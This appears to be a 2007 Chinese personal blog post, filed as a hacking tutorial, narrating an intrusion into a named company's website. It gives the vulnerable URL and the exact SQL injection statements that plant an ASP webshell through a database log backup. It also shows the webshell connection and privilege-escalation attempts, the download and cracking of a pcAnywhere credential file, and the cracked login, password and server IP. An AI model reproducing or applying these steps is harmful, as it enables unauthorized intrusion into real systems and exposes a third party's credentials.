注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

我的博客

小猪哥

 
 
 

日志

 
 

DB_OWNER权限注入加pcAnywhere连接  

2007-03-23 08:23:51|  分类: 黑客技术 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

今天要用到的工具是一.help.asp[大马一只]

                  二.PcAnywhere密码破解.exe

                  三.pcAnywhere汉化版 我没找到 呵呵

                  四.lake2的eval最小马发送端

                  五.DSQLTools.exe

                  六.NBSI2API.exe

好了 就这样吧  现在开始做教程

现在我已经得到了一只DB_OWNER权限的鸡吧 呵呵

现在我们打开啊D

http://www.jamemost.com.cn/English/product_list.asp?ProductCatID=15&ProductID=20

这是存在的注入点

看到了吧 DB_OWNER权限  现在我们要做的是查找站的跟目录 D:\Webhome\jamemost\web\

这个是站的跟目录

现在我们要用到log 备份得到权限 .由于我用的是2.5的 不支持自动上传 现在我手动上传

大家看我操作  这里的a 是连接密码 相关的教程里面都会有解释D:\Webhome\jamemost\web\

这是站的跟目录 刚刚已经讲过了 现在我给大家演示一下

要用到的命令是

';alter database JiaMao set RECOVERY FULL--

';create table cmd (a image)--

';backup log JiaMao to disk = 'e:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log JiaMao to disk = 'D:\Webhome\jamemost\web\lalala.asp'--

5步操作 现在我们打开../lalala.asp

已经成功,现在我们用lake2的eval最小马连接.

估计我掉线了 今天网吧真垃圾!~

不好意思了 好了 嘿嘿 现在继续..

Save to D:\Webhome\jamemost\web\lalala1.asp Success ! 上传成功了.现在我们连接一下

刚刚密码被我改成123456了 我们登陆 进来了 首先我们看一下能不能CMD

ws cript.shell √ 命令行执行组件  支持的

没有权限..所以我们只能看下serv-u 提权试试 3389也没有开放..我们只好找找别的漏洞了

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 嘿嘿..

现在开始下载它的2PCA.ourspinxi.CIF CIF格式的哦..看清楚下

下好后我们用PcAnywhere密码破解.exe 破解 直接拖到里面就好了

User information:

Login name: ourspinxi

Password: %*#%!)^@

现在我们用pcanywhere 连接试试  这里是它的IP 222.73.250.93 这里 好了 我们连接看下

然后输入帐号密码 被锁屏了 没法演示了 这里我给大家只是一种思路 要学会利用

  评论这张
 
阅读(180)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018